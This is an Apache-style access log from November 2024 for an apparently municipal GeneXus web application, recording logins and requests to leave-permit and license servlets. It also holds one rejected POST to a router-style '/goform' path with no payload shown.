190.171.149.74 - - [27/Nov/2024:09:32:08 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 6848
190.171.149.74 - - [27/Nov/2024:09:32:19 -0300] "GET /cormun/servlet/permisogoce?26cf79cad235d664b21bb5695d3f06c59cdcffc8867269ba5a906800dc2f877ecc89650fb27b855049e2ce671058939621042587958c0c17345f0f10db5429ba,gx-no-cache=1732710743732 HTTP/1.1" 200 81
190.171.149.74 - - [27/Nov/2024:09:32:26 -0300] "GET /cormun/servlet/permisogoce?26cf79cad235d664b21bb5695d3f06c574f0ee4a87605be91cc761281f83df1966a4f319c473bce1912abf47080b9c8b9bc46ec7bbd534fbc84944ad9aeea64e,gx-no-cache=1732710751249 HTTP/1.1" 200 48
190.171.149.74 - - [27/Nov/2024:09:32:31 -0300] "POST /cormun/servlet/permisogoce?5252d3d9ea23fc1b70b1ae83ac8dff00,INS,0,,,,gx-no-cache=1732710753235 HTTP/1.1" 200 93
190.171.149.74 - - [27/Nov/2024:09:32:31 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1012
190.171.149.74 - - [27/Nov/2024:09:32:32 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 18649
190.171.149.74 - - [27/Nov/2024:09:32:34 -0300] "GET /cormun/servlet/apermisogoceprn?8527596,P,20241127093204,PU HTTP/1.1" 200 1654
101.71.38.198 - - [27/Nov/2024:09:32:57 -0300] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 -
190.171.144.234 - - [27/Nov/2024:09:42:43 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1716
190.171.144.234 - - [27/Nov/2024:09:42:57 -0300] "POST /cormun/servlet/hlogin?d67a6ef766825912a3b63a9fe602994f,gx-no-cache=1732711383886 HTTP/1.1" 200 90
190.171.144.234 - - [27/Nov/2024:09:42:57 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 947
190.171.144.234 - - [27/Nov/2024:09:42:57 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3992
190.171.152.114 - - [27/Nov/2024:09:43:28 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 15985
190.171.144.234 - - [27/Nov/2024:09:44:18 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 14216
190.171.144.234 - - [27/Nov/2024:09:44:18 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 14213
190.171.144.234 - - [27/Nov/2024:09:44:22 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 6854
